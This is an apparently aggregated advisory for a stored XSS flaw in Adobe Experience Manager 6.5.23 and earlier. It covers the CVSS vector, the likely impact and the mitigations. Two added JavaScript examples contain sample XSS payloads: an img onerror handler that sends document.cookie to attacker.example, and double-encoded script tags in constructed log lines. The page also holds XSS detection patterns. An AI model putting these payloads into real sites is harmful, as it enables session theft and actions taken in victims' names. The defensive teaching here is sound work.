
CVE-2026-27225: Cross-site Scripting (Stored XSS) (CWE-79) in Adobe Experience Manager

Severity: Medium
Tags: vulnerability, cve-2026-27225, cwe-79
Published: Wed Mar 11 2026 (03/11/2026, 00:23:26 UTC)
Source: CVE Database V5
Vendor/Project: Adobe
Product: Adobe Experience Manager

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

AI-Powered Analysis

Last updated: 03/11/2026, 01:31:37 UTC

Technical Analysis

CVE-2026-27225 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) 6.5.23 and earlier. Stored XSS arises when the application persists attacker-supplied input and later renders it into a page without context-appropriate encoding, so the browser parses the input as markup or script rather than as data. Here, an attacker holding a low-privileged AEM account can write JavaScript into vulnerable form fields; the payload is stored and executes in the browser of every user who later views the page containing that field, in the origin of the affected AEM site. Because the payload persists, it reaches users with more privileges than the attacker, which is what makes stored XSS a privilege-escalation path: the script can read what the victim can read, submit requests with the victim's session, or redirect the victim to an attacker-controlled site. Exploitation requires an authenticated account with privileges sufficient to submit content into the affected fields (PR:L) and a victim who visits the page (UI:R). The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, which computes to a 5.4 (Medium) base score, encodes network reachability, low attack complexity, low privileges required, user interaction required, a scope change (the vulnerable component is AEM, the impacted component is the victim's browser), and limited confidentiality and integrity impact with no availability impact. No exploitation in the wild is reported, but AEM's broad enterprise footprint and the persistence of the payload make this a moderate risk. No patch was listed at the time of disclosure, so compensating mitigations are warranted until a vendor fix is available.
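To make the mechanism concrete, here is an added example in JavaScript; it is not AEM code and not from this page. It takes a constructed form-field value, renders it two ways (raw interpolation, the pattern behind stored XSS, and context-aware encoding, which is what HTL expressions give you by default) and then lists the elements an HTML parser would open in each output. The STORED_FIELD payload, the renderUnsafe/renderSafe templates and the tagNames check are all constructed for illustration.

```javascript
// Added example, not AEM code: a minimal stored-XSS round trip.
// A form-field value is persisted and later rendered into a page.
// renderUnsafe() interpolates the raw value (the pattern behind stored XSS);
// renderSafe() encodes it for each HTML context it lands in.

// Constructed sample: what a low-privileged user submitted into a form field.
const STORED_FIELD =
  "Jane <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">";

// Vulnerable: the stored value is spliced into markup without encoding.
function renderUnsafe(name) {
  return `<p class="author">${name}</p>`;
}

// Encoder for the HTML text context: the five characters that can
// open a tag, close an attribute, or start an entity.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encoder for an HTML attribute value: encode everything except
// alphanumerics as a numeric entity, which also neutralises unquoted
// attribute contexts.
function encodeForHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// Hardened: the same value lands in two contexts, each with its own encoder.
function renderSafe(name) {
  return `<p class="author" title="${encodeForHtmlAttr(name)}">${encodeForHtml(name)}</p>`;
}

// Lists the element names an HTML parser would open in the string,
// so injected markup shows up as tags the template never emitted.
function tagNames(html) {
  return Array.from(html.matchAll(/<([A-Za-z][\w-]*)/g), (m) => m[1].toLowerCase());
}

// Tags present in the output that the template itself does not emit.
function injectedTags(html, templateTags) {
  return tagNames(html).filter((t) => !templateTags.includes(t));
}

console.log("unsafe:", injectedTags(renderUnsafe(STORED_FIELD), ["p"])); // [ 'img' ]
console.log("safe:  ", injectedTags(renderSafe(STORED_FIELD), ["p"]));   // []
```

The point of the two encoders is that one is not enough: a value that is safe in the text of a paragraph is not automatically safe inside an attribute or a script block, so the encoder has to match the context the template puts the value into.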

Potential Impact

A successful exploit lets attacker-controlled script run with the victim's browser state for the AEM site: session hijacking, actions performed in the victim's name (including content changes, if the victim is an author or administrator), capture of credentials through injected login prompts, and delivery of further malicious content. For organizations this translates to compromised accounts, exposure of data the victims can access, reputational damage and regulatory consequences. Because AEM is widely deployed by enterprises and government bodies to manage web content, and because a stored payload fires for every visitor to the page, a single injection can reach many users, including sensitive ones. The scope change (S:C) in the CVSS vector reflects that the impacted component, the victim's browser, differs from the vulnerable component, the AEM application; it does not by itself imply impact beyond the browser session. Availability is unaffected; confidentiality and integrity of user data and interactions are at risk. The need for a low-privileged account and for the victim to visit the page lowers the ease of exploitation without removing the threat, especially on public-facing sites with many users. One caveat for triage: an HttpOnly flag on session cookies stops injected script from reading them, but the script can still send authenticated requests from the victim's browser, so HttpOnly limits cookie theft rather than account abuse.

Mitigation Recommendations

Until a vendor fix is available, treat this as a compensating-controls problem. Output encoding at render time is the primary defence: audit the components that render the affected form fields and make sure every value is encoded for the context it lands in (HTML body, attribute, JavaScript string, URL). HTL expressions escape by default, so look specifically for expressions that opt out (context='unsafe'), for raw string concatenation in JSP or Java, and for client-side code that writes stored values with innerHTML; Sling's XSSAPI (encodeForHTML, encodeForHTMLAttr, encodeForJSString, filterHTML) exists for the server side. Input validation on the form fields (length, character class) reduces the attack surface but is not a substitute for encoding. Deploy a Content Security Policy on the publish tier that restricts script-src to a nonce or hash plus trusted origins; a policy that allows 'unsafe-inline' or wildcard origins will not stop this class of attack. Set HttpOnly and SameSite on session cookies to limit cookie theft. Monitor form-submission and request logs for XSS indicators (tags, on*= handlers, javascript: URIs), decoding URL-encoding more than once so double-encoded payloads are not missed. Review which groups can write to the affected fields and remove the permission from accounts that do not need it. If exposure cannot otherwise be reduced, disable or restrict the affected form functionality or take the affected instances off the public internet. Keep stored XSS in scope for regular assessments and penetration tests, and remind users to report unexpected prompts or redirects on internal sites.
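Two of the mitigations above, log monitoring and CSP review, can be checked mechanically. The following is an added example in JavaScript, not code from this page or from Adobe. The log format and every sample line are constructed for the example (they are not a real AEM log format), and the cspWeaknesses grading is an assumption of what a minimal check should cover; it applies the CSP rule that 'unsafe-inline' is ignored by browsers when a nonce or hash source is present.

```javascript
// Added example, not code from the page or from Adobe. Two checks a defender
// can run while a fix is pending: scan form-submission logs for stored-XSS
// indicators, and grade a Content-Security-Policy header for script-src gaps.
// The log format and every line below are constructed for this example;
// they are not a real AEM log format.

const SAMPLE_LOG = [
  "2026-03-11T00:20:01Z user=contributor01 POST /content/site/contact.form field=comment value=Thanks%20for%20the%20help",
  "2026-03-11T00:21:17Z user=contributor02 POST /content/site/contact.form field=name value=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E",
  "2026-03-11T00:22:40Z user=contributor03 POST /content/site/contact.form field=bio value=javascript%3Aalert(document.domain)",
  // double URL-encoded <script src="https://attacker.example/p.js"></script>
  "2026-03-11T00:23:05Z user=contributor04 POST /content/site/contact.form field=name value=%253Cscript%2520src%253D%2522https%253A%252F%252Fattacker.example%252Fp.js%2522%253E%253C%252Fscript%253E",
  // benign use of < and > that must not fire
  "2026-03-11T00:24:30Z user=contributor05 POST /content/site/contact.form field=comment value=1%20%3C%202%20but%203%20%3E%202",
];

// Indicators of markup or script in a value that should be plain text.
const XSS_INDICATORS = [
  { name: "tag", re: /<\s*\/?\s*[a-z]/i },
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "event-handler", re: /\bon[a-z]+\s*=/i },
  { name: "js-uri", re: /javascript\s*:/i },
];

const LINE_RE = /^(\S+) user=(\S+) (\S+) (\S+) field=(\S+) value=(\S*)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ts: m[1], user: m[2], method: m[3], path: m[4], field: m[5], raw: m[6] };
}

// Decode until the value stops changing (bounded), so %253C -> %3C -> < is caught.
function decodeRepeatedly(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed escape
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns one finding per line whose decoded value matches any indicator.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;
    const decoded = decodeRepeatedly(entry.raw);
    const hits = XSS_INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
    if (hits.length) findings.push({ user: entry.user, field: entry.field, decoded, indicators: hits });
  }
  return findings;
}

// Parses a CSP header and reports script-src settings that would let
// injected script run. 'unsafe-inline' is only an issue when no nonce or
// hash source is present, because browsers ignore it otherwise.
function cspWeaknesses(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  const scriptSrc = directives.get("script-src") || directives.get("default-src");
  if (!scriptSrc) return ["no script-src or default-src: any script may run"];
  const issues = [];
  const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  if (scriptSrc.some((s) => s.toLowerCase() === "'unsafe-inline'") && !hasNonceOrHash)
    issues.push("script-src allows 'unsafe-inline' without a nonce or hash");
  if (scriptSrc.includes("*")) issues.push("script-src allows any origin (*)");
  if (scriptSrc.some((s) => /^(https?|data):$/i.test(s))) issues.push("script-src allows a whole scheme");
  return issues;
}

console.log(scanLog(SAMPLE_LOG).map((f) => `${f.user} ${f.field}: ${f.indicators.join(",")}`));
console.log(cspWeaknesses("default-src 'self'; script-src 'self' 'unsafe-inline'"));
```

The bounded decode loop is the part worth keeping: a scanner that decodes once sees `%3Cscript` for the fourth line and never matches, while the stored value, once AEM has decoded the request, is a live script tag. The benign fifth line shows why the tag indicator requires a letter after `<` rather than flagging every angle bracket.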


Technical Details

Data Version: 5.2
Assigner Short Name: adobe
Date Reserved: 2026-02-18T22:02:41.380Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 69b0be882f860ef943f0dcc5

Added to database: 3/11/2026, 12:59:52 AM

Last enriched: 3/11/2026, 1:31:37 AM

Last updated: 3/12/2026, 11:52:27 PM


